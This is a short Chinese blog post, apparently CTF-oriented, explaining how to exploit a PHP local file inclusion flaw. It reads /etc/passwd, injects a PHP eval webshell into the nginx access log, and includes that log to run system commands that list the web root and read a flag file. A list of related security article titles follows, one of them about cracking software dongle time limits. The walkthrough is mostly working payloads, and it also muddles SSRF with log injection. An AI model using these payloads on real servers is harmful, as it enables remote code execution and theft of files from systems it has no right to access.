文件包含漏洞

和文件上传漏洞相关联的就是文件包含漏洞了,这是对于漏洞的进一步利用。这边是一些相对比较基础和常见的上传路径整理和方法,后面会继续更新。

对于文件包含漏洞,找到上传位置是一个比较重要的操作。

首先判断是否可以进行日志注入,判断的条件是是否可以进行ssrf漏洞。

传参/etc/passwd,如果成功,则代表可以进行日志注入

复制代码
?file=/etc/passwd

这里还要知道的是我们访问的网页文件一般默认存放在**/var/www/html**

默认nginx日志文件在/var/log/nginx/access.log

可以直接命令执行即可也可以用webshell后门工具连接

复制代码
<?php eval($_GET[2]);?>

可以直接命令执行即可也可以用webshell后门工具连接

?file=/var/log/nginx/access.log&2=system('ls /var/www/html');phpinfo();

?file=/var/log/nginx/access.log&2=system('tac /var/www/html/fl0g.php');phpinfo();
相关推荐
V搜xhliang02461 小时前
具身机器人在实际场景中的安全保障
人工智能·安全·计算机视觉·分类·机器人·知识图谱
谪星·阿凯1 小时前
CSRF&SSRF漏洞攻击:溯源解析与实战指南
安全·web安全·php·csrf
Lim小刘2 小时前
告别“裸奔”:OpenClaw 龙虾 Agent 在 AWS 上的企业级安全加固实战
人工智能·安全·aws·openclaw
上海云盾-小余2 小时前
高防集群架构深度解析:从流量清洗到业务无感防护实战
网络·安全·web安全·架构·ddos
临水逸2 小时前
2026年“3·15”晚会以“放心消费 品质生活”为主题
安全·生活
星幻元宇VR2 小时前
VR地震科普学习机|沉浸式防震减灾新体验
学习·安全·vr·虚拟现实
加密狗复制模拟2 小时前
软件加密狗中时间限制机制的破解
开发语言·网络·安全·php·软件工程·个人开发
FreeBuf_3 小时前
为何安全验证正迈向Agentic时代
网络·安全
芯盾时代3 小时前
医疗行业网络安全的需求
网络·安全·web安全
乾元3 小时前
职业进阶: 传统安全工程师如何转型为 AI 安全专家?
网络·人工智能·安全·web安全·机器学习·网络安全·安全架构